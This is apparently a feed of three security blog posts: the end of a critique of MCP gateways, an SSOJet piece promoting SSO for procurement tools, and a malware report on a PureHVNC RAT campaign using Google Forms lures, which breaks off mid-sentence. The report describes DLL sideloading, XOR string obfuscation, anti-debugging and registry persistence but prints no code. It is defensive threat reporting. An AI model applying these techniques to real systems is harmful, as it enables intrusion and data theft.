security perspective, shell access is often far more dangerous than a typical MCP tool.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">If your security model only protects MCP, you are left with big blind spots. You are securing one door while the windows, back door, and garage are wide open.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">2. They introduce a new secret management risk</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">To work, many gateways require you to route requests, and often credentials, through them. API keys, OAuth tokens, service accounts, and other sensitive secrets may now live in or pass through a third-party system.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Instead of reducing risk, you have just increased the number of places where your secrets exist, the number of systems that could be compromised, and the number of new vendors or services in your threat model. You tried to solve one problem, uncontrolled tool use, and created another, centralized secret exposure.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">3. They lack full agent context</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Security is all about context. To decide whether a tool call is safe, you need to know the user prompt, the agent goal, the session history, what other tools were called before, and whether this call is part of a larger workflow or just a strange one-off. A gateway usually sees something like “Call tool X with arguments Y from client Z.” That is useful but incomplete.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Without full session context, advanced detection is almost impossible. You cannot reliably flag suspicious sequences of actions, distinguish benign calls from data exfiltration, or enforce nuanced, context-aware policies like “only allow this if the user is in group A and the data is tagged B.” You end up with either overly permissive rules or very basic, noisy ones.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">4. They are a single point of failure</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Most MCP Gateways are built as proxies or reverse proxies. If the gateway is down, misconfigured, rate-limited, or suffering from network issues, your agents are effectively offline.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Instead of building resilient systems, you centralize everything behind one piece of infrastructure that now has to be highly available, low-latency, secure, and correctly configured across all environments. That is a lot of operational overhead for something that is supposed to “just” add security.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">5. They are hard to enforce across all clients</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Even with a perfect design, you still face a major practical problem. How do you force every client and every agent to use the gateway? Agents can run in local developer environments, CI pipelines, different services or microservices, IDEs and notebooks, and on machines you do not fully control. If a client can talk directly to an MCP server, it can bypass the gateway unless you apply strict network and configuration controls everywhere.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">In practice, this often results in some traffic passing through the gateway and some not. You think you have control, but you do not have full coverage. Partial security can be worse than no security because it creates a false sense of safety.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The good news is that there’s a better approach, one that actually addresses these fundamental problems instead of working around them. If MCP Gateways are the wrong layer, what is the right one?</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="2"><span data-contrast="auto">Runtime Hooks – Securing the Entire Layer, Not Just the Protocol</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":240,"335559739":240}'> </span></h3><p><span data-contrast="auto">The best place to secure agents is inside the agent runtime itself, not at the edge of a single protocol. That is where runtime hooks come in.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Hooks are built into the agent framework and trigger whenever tools are used.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto"> Runtime hooks solve the core limitations with gateways as a security guardrail:</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">Full coverage across all tooling, not just MCP</span><span data-ccp-props='{"335559738":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">No credential exposure to third parties</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">Access to full session and prompt context</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">No single point of failure</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="5" data-aria-level="1"><span data-contrast="auto">Easy configuration and rollout</span><span data-ccp-props='{"335559739":240}'> </span></li></ul><p><span data-contrast="auto">Because hooks live at the agent layer, they can see MCP tools, shell commands, native SDK calls, HTTP requests, and framework-specific connectors. If the agent invokes something, a hook can catch it. You are not limited to monitoring just one protocol while everything else runs unobserved.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">In addition, to avoid credential exposure, hooks run inside your environment and inside your agent code. They do not require you to send your secrets to a third party. Secrets remain in your existing systems, no extra proxy or gateway needs to store API keys, and you keep complete control over secret management. Hooks can inspect metadata and arguments without becoming a new storage location for credentials.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Running inside your code and environment provides additional value, where hooks can see the full conversation history, the current prompt, the agent state or plan, and previous tool calls in the same session. Your security logic can be truly context-aware. You can write policies like “block this call if the user is external and the data is marked internal only” or “alert if the agent chains several export-style tools suspiciously.” This is extremely hard to do from a protocol-level gateway that only sees isolated tool call requests.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Because hooks are typically implemented as part of the agent SDK or runtime, they avoid creating a single point of failure. If a hook fails, you can design it to fail safely, denying only the risky call, or to degrade gracefully while the agent continues to run. You are not routing all traffic through one central network bottleneck. You are adding behavioral controls inside each agent process.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Finally, hooks are easier to deploy and manage. Instead of managing complex network paths and proxies, you enable hooks in your agent framework, configure policies in one place, and ship that configuration with your agents. This is far easier to standardize across teams and environments than enforcing gateways for every client. On top of that, no code changes are required if hooks are integrated at the framework or platform level. Teams can adopt security controls by configuration alone, without modifying each agent implementation.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="3"><span data-contrast="none">MCP Registries: Control at the Source</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":240,"335559739":240}'> </span></h3><p><span data-contrast="auto">Runtime hooks secure how tools are used, but decades of security practice have taught us that good hygiene requires defense in depth. You need controls at multiple layers, and one of the most effective is controlling what exists in your environment in the first place.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">This is not a new or novel idea. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We learned this lesson with package managers, container registries, and API gateways. Allowlists and approved registries prevent unauthorized code and tools from entering your systems, and the same principles should be applied to MCP servers.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">An MCP Registry lets you maintain an allowlist of approved MCP servers in your organization, define which tools are available to which teams or environments, and prevent agents from discovering or using unapproved MCPs.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Combined with runtime hooks, this gives you a strong two-layer model. The registry controls what is allowed, which MCPs and tools exist in your environment, while the hooks control how those tools are used, including policies, context checks, and detections. This applies years of proven runtime security principles to a new attack surface, rather than trying to retrofit network-layer controls that were never designed for this problem.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="2"><span data-contrast="auto">Beyond MCP Security – Securing the Entire Agentic Attack Surface</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":240,"335559739":240}'> </span></h3><p><span data-contrast="auto">MCP is powerful and here to stay. It deserves a security model that actually matches how agents work in practice.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">MCP Gateways repeat the mistakes of perimeter security by focusing on a single protocol, while agents are not limited to a single use case.  They employ shell commands, native SDKs, database connections, and framework-specific tools. This introduces secret management risks through centralized credential handling, a lack of the full agent and session context needed for effective policy decisions, and creates both a single point of failure and enforcement challenges across distributed environments.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We do not need to reinvent security models to secure agentic systems in production. Decades of running complex, distributed systems have already taught us what works and which layers are most critical to secure. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Runtime hooks combined with MCP registries. Hooks give you full coverage across all tooling, complete session context for policy decisions, no credential exposure to third parties, no central bottleneck, and easy rollout with no code changes when integrated at the framework level. </span><br><span data-contrast="auto">This, combined with well-maintained registries give you governance and control over which MCPs exist in your environment in the first place.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The agentic world is evolving too fast to bet on protocol-level controls – secure the agent where it actually runs, not just the protocol it happens to use today.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/why-mcp-gateways-are-a-bad-idea-and-what-to-do-instead/" data-a2a-title="Why MCP Gateways are a Bad Idea (and What to Do Instead)   "><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhy-mcp-gateways-are-a-bad-idea-and-what-to-do-instead%2F&amp;linkname=Why%20MCP%20Gateways%20are%20a%20Bad%20Idea%20%28and%20What%20to%20Do%20Instead%29%C2%A0%20%20%C2%A0" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhy-mcp-gateways-are-a-bad-idea-and-what-to-do-instead%2F&amp;linkname=Why%20MCP%20Gateways%20are%20a%20Bad%20Idea%20%28and%20What%20to%20Do%20Instead%29%C2%A0%20%20%C2%A0" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhy-mcp-gateways-are-a-bad-idea-and-what-to-do-instead%2F&amp;linkname=Why%20MCP%20Gateways%20are%20a%20Bad%20Idea%20%28and%20What%20to%20Do%20Instead%29%C2%A0%20%20%C2%A0" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhy-mcp-gateways-are-a-bad-idea-and-what-to-do-instead%2F&amp;linkname=Why%20MCP%20Gateways%20are%20a%20Bad%20Idea%20%28and%20What%20to%20Do%20Instead%29%C2%A0%20%20%C2%A0" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhy-mcp-gateways-are-a-bad-idea-and-what-to-do-instead%2F&amp;linkname=Why%20MCP%20Gateways%20are%20a%20Bad%20Idea%20%28and%20What%20to%20Do%20Instead%29%C2%A0%20%20%C2%A0" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<h2><strong>Introduction</strong></h2><p>Procurement is no longer a back-office function handled through spreadsheets and manual approvals. Modern enterprise teams depend on a growing stack of third-party tools to manage vendor relationships, purchase orders, contract lifecycles, and spend analytics. As these platforms become more deeply integrated into daily operations, they also become high-value targets for unauthorized access and data exfiltration.</p><p>Enterprise teams often rely on <a href="https://www.procureflow.ai/">software that supports procurement</a> to manage vendors, approvals, and spending workflows. Without centralized SSO and role-based access control, these systems can become a major internal risk surface. When each procurement tool maintains its own authentication silo, security teams lose visibility and control over who has access to what—and that’s precisely the gap that enterprise SSO is designed to close.</p><h2><strong>Why Procurement Platforms Are a Security Blind Spot</strong></h2><p>Most organizations focus their identity and access management (IAM) efforts on core systems like CRMs, ERPs, and collaboration tools. Procurement platforms, despite handling sensitive financial data and vendor contracts, frequently fall outside the scope of centralized security policies. This creates several risks:</p><p><strong>Credential sprawl:</strong> Every standalone procurement tool adds another set of credentials for employees to manage. Weak or reused passwords across these platforms significantly increase the attack surface.</p><p><strong>Orphaned accounts:</strong> When employees leave or change roles, their access to procurement platforms often persists because these tools aren’t integrated into the organization’s identity provider (IdP). This results in stale accounts that can be exploited.</p><p><strong>Lack of audit trails:</strong> Without SSO integration, it’s nearly impossible to maintain a unified audit log of who accessed procurement data, when, and what actions they performed. This is a compliance liability under frameworks like SOC 2, ISO 27001, and GDPR.</p><p><strong>Shadow procurement:</strong> Teams sometimes adopt procurement tools without IT or security approval, creating shadow IT scenarios where sensitive vendor and financial data flows through unsanctioned channels.</p><h2><strong>The Role of Enterprise SSO in Procurement Security</strong></h2><p>Enterprise Single Sign-On (SSO) addresses these vulnerabilities by centralizing authentication through a single identity provider. When procurement platforms are brought under the SSO umbrella, organizations gain several critical capabilities:</p><h3><strong>Centralized Authentication and Lifecycle Management</strong></h3><p>With SSO, employees authenticate once through the organization’s IdP (such as Okta, Azure AD, or Google Workspace) and gain access to all authorized procurement tools without separate logins. More importantly, when an employee is offboarded from the IdP, their access to every connected application—including procurement platforms—is revoked automatically. This eliminates the orphaned account problem entirely.</p><h3><strong>Enforced Multi-Factor Authentication (MFA)</strong></h3><p>SSO allows organizations to enforce MFA policies consistently across all connected applications. Instead of relying on each procurement vendor’s native MFA implementation (which may vary in strength or not exist at all), the IdP enforces a uniform authentication standard. This is particularly important for procurement platforms where a single compromised account could approve fraudulent purchase orders.</p><h3><strong>Role-Based Access Control (RBAC) Through SCIM</strong></h3><p>Enterprise SSO implementations often include SCIM (System for Cross-domain Identity Management) provisioning, which synchronizes user roles and permissions from the IdP to connected applications. In the procurement context, this means that a finance manager automatically receives approver-level access while a department requester gets view-and-submit permissions—without manual configuration in each tool.</p><h3><strong>Unified Compliance and Audit Trails</strong></h3><p>When all procurement platform access flows through a centralized IdP, security teams get a single pane of glass for monitoring authentication events. This unified audit trail simplifies compliance reporting and makes it easier to detect anomalous access patterns—like a user suddenly accessing procurement data outside normal business hours or from an unfamiliar location.</p><h2><strong>Common SSO Standards for Procurement Integration</strong></h2><p>Not all procurement platforms support SSO out of the box, and the standards they support can vary. Understanding the key protocols helps organizations evaluate procurement tools and plan their integration strategy:</p><p><strong>SAML 2.0:</strong> The most widely supported enterprise SSO standard. SAML-based authentication is XML-heavy but mature and well-understood by IdPs. Most enterprise-grade procurement platforms support SAML integration.</p><p><strong>OIDC (OpenID Connect):</strong> A modern, lightweight alternative to SAML built on OAuth 2.0. OIDC is increasingly adopted by SaaS procurement tools and offers easier implementation for developers.</p><p><strong>SCIM 2.0:</strong> While not an authentication protocol, SCIM is essential for automated user provisioning and de-provisioning. It ensures that role changes in the IdP are reflected in procurement platforms in near real-time.</p><p>Organizations evaluating procurement platforms should prioritize those that support at least SAML 2.0 or OIDC, with SCIM provisioning as a strong differentiator for enterprise readiness.</p><h2><strong>Implementation Best Practices for Securing Procurement Platforms with SSO</strong></h2><p><strong>1. Inventory all procurement tools.</strong> Before rolling out SSO, catalog every procurement-related application in use across the organization—including tools adopted by individual teams without IT oversight. This inventory is the foundation for a comprehensive integration plan.</p><p><strong>2. Prioritize by data sensitivity.</strong> Rank procurement platforms by the sensitivity of the data they handle. Tools that process vendor contracts, payment information, or compliance documentation should be integrated with SSO first.</p><p><strong>3. Enforce SSO-only access.</strong> Where possible, disable local authentication on procurement platforms after SSO integration. Allowing password-based fallback creates a bypass that undermines the security benefits of centralized authentication.</p><p><strong>4. Implement SCIM for automated provisioning.</strong> Manual user management in procurement tools is unsustainable at scale. SCIM provisioning ensures that access rights are always current, reducing administrative overhead and eliminating security gaps during role transitions.</p><p><strong>5. Set up conditional access policies.</strong> Leverage your IdP’s conditional access capabilities to add context-aware security layers. For example, require step-up MFA when accessing procurement platforms from outside the corporate network, or block access from non-compliant devices.</p><p><strong>6. Monitor and review access regularly.</strong> Even with SSO and SCIM in place, periodic access reviews are essential. Verify that user roles in procurement platforms align with current job functions, and remove access that is no longer justified.</p><h2><strong>What to Look for in an SSO Provider for Procurement Use Cases</strong></h2><p>Not all SSO solutions are built for the complexity of enterprise procurement environments. When evaluating providers, consider the following:</p><p><strong>Broad protocol support:</strong> The provider should support SAML 2.0, OIDC, and SCIM to cover the widest range of procurement platforms.</p><p><strong>Pre-built integrations:</strong> Look for providers that offer pre-configured connectors for popular procurement and spend management tools, reducing implementation time.</p><p><strong>Developer-friendly APIs:</strong> For procurement platforms that lack native SSO support, the provider should offer well-documented APIs and SDKs that enable custom integration.</p><p><strong>Compliance-ready:</strong> The SSO provider should support compliance frameworks relevant to procurement, including SOC 2 Type II, ISO 27001, and GDPR.</p><p><strong>Multi-tenant architecture:</strong> Enterprise teams managing procurement across multiple business units or subsidiaries need an SSO solution that supports multi-tenant configurations without sacrificing security isolation.</p><p>SSOJet is purpose-built for these enterprise requirements, offering SAML and OIDC support, SCIM-based directory sync, and a developer-first API that makes it straightforward to bring even custom procurement platforms under centralized identity management.</p><h2><strong>The Cost of Not Securing Procurement Platforms</strong></h2><p>The financial and reputational risks of leaving procurement platforms outside the SSO perimeter are significant. A compromised procurement account can lead to fraudulent vendor payments, unauthorized contract modifications, or data breaches involving sensitive supplier information. Beyond direct financial losses, organizations face regulatory penalties if audit trails are incomplete or access controls are found lacking during compliance assessments.</p><p>The 2023 Verizon Data Breach Investigations Report found that stolen credentials were involved in nearly 50% of all breaches. Procurement platforms, with their access to financial data and vendor ecosystems, represent exactly the kind of high-value target where credential-based attacks do the most damage.</p><h2><strong>Conclusion</strong></h2><p>Securing third-party procurement platforms with enterprise SSO isn’t a nice-to-have—it’s a critical component of modern security architecture. As procurement workflows become more distributed and tool stacks grow more complex, centralized identity management through SSO and SCIM provisioning is the most effective way to maintain control over access, enforce consistent security policies, and meet compliance obligations.</p><p>Organizations that proactively integrate their procurement platforms with SSO reduce their attack surface, streamline user lifecycle management, and gain the visibility needed to detect and respond to threats before they escalate. The question isn’t whether to secure procurement platforms with SSO—it’s how quickly you can close the gap.</p><p><strong>Ready to secure your procurement stack?</strong> SSOJet makes it easy to integrate enterprise SSO across your entire SaaS portfolio—including procurement, spend management, and vendor tools. <a href="https://ssojet.com/">Get started with SSOJet</a> today.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/securing-third-party-procurement-platforms-with-enterprise-sso/" data-a2a-title="Securing Third-Party Procurement Platforms with Enterprise SSO"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecuring-third-party-procurement-platforms-with-enterprise-sso%2F&amp;linkname=Securing%20Third-Party%20Procurement%20Platforms%20with%20Enterprise%20SSO" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecuring-third-party-procurement-platforms-with-enterprise-sso%2F&amp;linkname=Securing%20Third-Party%20Procurement%20Platforms%20with%20Enterprise%20SSO" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecuring-third-party-procurement-platforms-with-enterprise-sso%2F&amp;linkname=Securing%20Third-Party%20Procurement%20Platforms%20with%20Enterprise%20SSO" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecuring-third-party-procurement-platforms-with-enterprise-sso%2F&amp;linkname=Securing%20Third-Party%20Procurement%20Platforms%20with%20Enterprise%20SSO" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fsecuring-third-party-procurement-platforms-with-enterprise-sso%2F&amp;linkname=Securing%20Third-Party%20Procurement%20Platforms%20with%20Enterprise%20SSO" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://ssojet.com/blog">SSOJet - Enterprise SSO &amp;amp; Identity Solutions</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by SSOJet - Enterprise SSO &amp; Identity Solutions">SSOJet - Enterprise SSO &amp; Identity Solutions</a>. Read the original post at: <a href="https://ssojet.com/blog/secure-third-party-procurement-sso">https://ssojet.com/blog/secure-third-party-procurement-sso</a> </p>

<p>We’ve identified a campaign using business-related lures, such as job interviews, project briefs, and financial document, to distribute malware, including the PureHVNC Remote Access Trojan (RAT).</p><p>It’s not the malware that’s new, but how the attack starts.</p><p>Instead of the usual phishing email or fake download page, attackers are using Google Forms to kick off the infection chain. The attack typically begins when a victim downloads a business-themed ZIP file linked from a Google Form. Inside is a malicious file that sets off a multi-stage infection process, eventually installing malware on the system.</p><h2 class="wp-block-heading" id="h-what-is-purehvnc">What is PureHVNC?</h2><p>PureHVNC is a <strong>modular</strong> <strong>.NET</strong> <strong>RAT </strong>from the “Pure” malware family. In simple terms, it gives attackers remote control over an infected device and lets them steal sensitive information. </p><p>Once installed, it can:</p><ul class="wp-block-list"> <li>Take control of the system and run commands remotely.</li> <li>Collect information about the device, including operating system, hardware, security software, and info about the user and connected devices.</li> <li>Steal data from browsers, extensions and crypto wallets.</li> <li>Extract data from apps like Telegram and Foxmail.</li> <li>Install additional plugins.</li> <li>Achieve persistence in several ways (for example, via scheduled tasks).</li> </ul><h2 class="wp-block-heading" id="h-different-lures-same-goal-compromise-your-device">Different lures, same goal: compromise your device</h2><p>In our research, we found multiple Google Forms hosting links to malicious ZIP files that start the infection chain. These forms are convincing, impersonating real company names, logos and links. LinkedIn is one of the platforms used to send links to these malicious forms.</p><div class="wp-block-jetpack-slideshow aligncenter" data-effect="slide" style="--aspect-ratio:calc(711 / 730)"> <div class="wp-block-jetpack-slideshow_container swiper"> <ul class="wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper"> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="711" height="730" alt="" class="wp-block-jetpack-slideshow_image wp-image-390399" data-id="390399" data-aspect-ratio="711 / 730" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/google-forms-lure-1.png?w=711"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">Fake Google Forms that distribute malicious ZIPs.</figcaption></figure> </li> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="716" height="866" alt="" class="wp-block-jetpack-slideshow_image wp-image-390400" data-id="390400" data-aspect-ratio="716 / 866" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/ad-partnership.png?w=716"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">The attackers impersonate real companies</figcaption></figure> </li> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="678" height="957" alt="" class="wp-block-jetpack-slideshow_image wp-image-390401" data-id="390401" data-aspect-ratio="678 / 957" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/project-details-lure.png?w=678"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">Well-known brands are impersonated to lend credibility</figcaption></figure> </li> </ul> <p><a class="wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white" role="button"></a><a class="wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white" role="button"></a><a aria-label="Pause Slideshow" class="wp-block-jetpack-slideshow_button-pause" role="button"></a></p> <div class="wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white"></div> </div> </div><p>The forms typically ask for professional information (experience, background, etc.), making them feel like part of a real recruitment or business process.</p><div class="wp-block-jetpack-slideshow aligncenter" data-effect="slide" style="--aspect-ratio:calc(820 / 868)"> <div class="wp-block-jetpack-slideshow_container swiper"> <ul class="wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper"> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="820" height="868" alt="Information requested from the user to make the form appear legitimate." class="wp-block-jetpack-slideshow_image wp-image-390225" data-id="390225" data-aspect-ratio="820 / 868" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_82ca84.png?w=820"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">Information requested from the user to make the form appear legitimate.</figcaption></figure> </li> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="840" height="977" alt="Information requested from the user to make the form appear legitimate." class="wp-block-jetpack-slideshow_image wp-image-390224" data-id="390224" data-aspect-ratio="840 / 977" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_d751b9.png?w=840"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">More information.</figcaption></figure> </li> </ul> <p><a class="wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white" role="button"></a><a class="wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white" role="button"></a><a aria-label="Pause Slideshow" class="wp-block-jetpack-slideshow_button-pause" role="button"></a></p> <div class="wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white"></div> </div> </div><p>The forms link to ZIP files hosted on:</p><ul class="wp-block-list"> <li>File-sharing services such as Dropbox, filedn.com, and fshare.vn</li> <li>URL shorteners such as tr.ee and goo.su</li> <li>Google redirect links that obscure the final destination</li> </ul><p>The ZIP archives use various names and are tied to different business-related themes (marketing, interviews, projects, job offers, budgets, partnerships, benefits) to avoid suspicion, for example:</p><ul class="wp-block-list"> <li><code>{CompanyName}_GlobalLogistics_Ad_Strategy.zip</code></li> <li><code>Project_Information_Summary_2026.zip</code></li> <li><code>{CompanyName} Project 2026 Interview Materials.zip</code></li> <li><code>{CompanyName}_Company_and_Job_Overview.pdf.rar</code></li> <li><code>Collaboration Project with {CompanyName} Company 2026.zip</code></li> </ul><p>The lures use the names of well-known companies, particularly in the financial, logistic, technology, sustainability and energy sectors. Impersonating legitimate organizations add credibility to their campaign.</p><h2 class="wp-block-heading" id="h-what-happens-after-you-download-the-file">What happens after you download the file</h2><p>The ZIP archives usually contain legitimate files (such as PDFs of job descriptions) and an executable file along with a DLL, typically named <code>msimg32.dll</code>. The DLL is executed via DLL hijacking (tricking a legitimate program into loading malicious code), although the technique has undergone multiple modifications and upgrades over time.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="497" height="701" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/google-form-pdf-image-1.png" alt="Legitimate PDFs are present in some ZIP files, like this one pretending to be a job description from a real company." class="wp-image-390430"><figcaption class="wp-element-caption">Legitimate PDFs are present in some ZIP files, like this one masquerading as a real job description.</figcaption></figure><h2 class="wp-block-heading" id="h-analysis-of-the-malicious-campaign">Analysis of the malicious campaign</h2><p>We identified multiple variants of this campaign, each using different methods to extract the archive, distinct Python code, and varying folder structures. Across these variants, the campaign typically includes an executable file along with a DLL hidden in a separate folder. In some cases, attackers also include legitimate files related to the lure’s theme, enhancing the overall credibility of the attack.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="872" height="157" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_35cd55.png" alt="Example of files present in one of the archives analyzed." class="wp-image-390222"><figcaption class="wp-element-caption">Example of files present in one of the archives analyzed.</figcaption></figure><p>The malicious code is present in the DLL, and carries out various operations, including:</p><ul class="wp-block-list"> <li>Decrypting strings with a simple XOR, in this case with the “4B” key.</li> <li>Detecting debugging and sandboxing with <code>IsDebuggerPresent()</code> and <code>time64()</code>, and displaying the error “This software has expired or debugger detected” if triggered.</li> <li>Deleting itself, then dropping and launching a fake PDF.</li> <li>Achieving persistence via the registry key <code>CurrentVersion\Run\Miroupdate</code>.</li> <li>Extracting the “final.zip” archive and running it.</li> </ul><p>In this case, the PDF was started 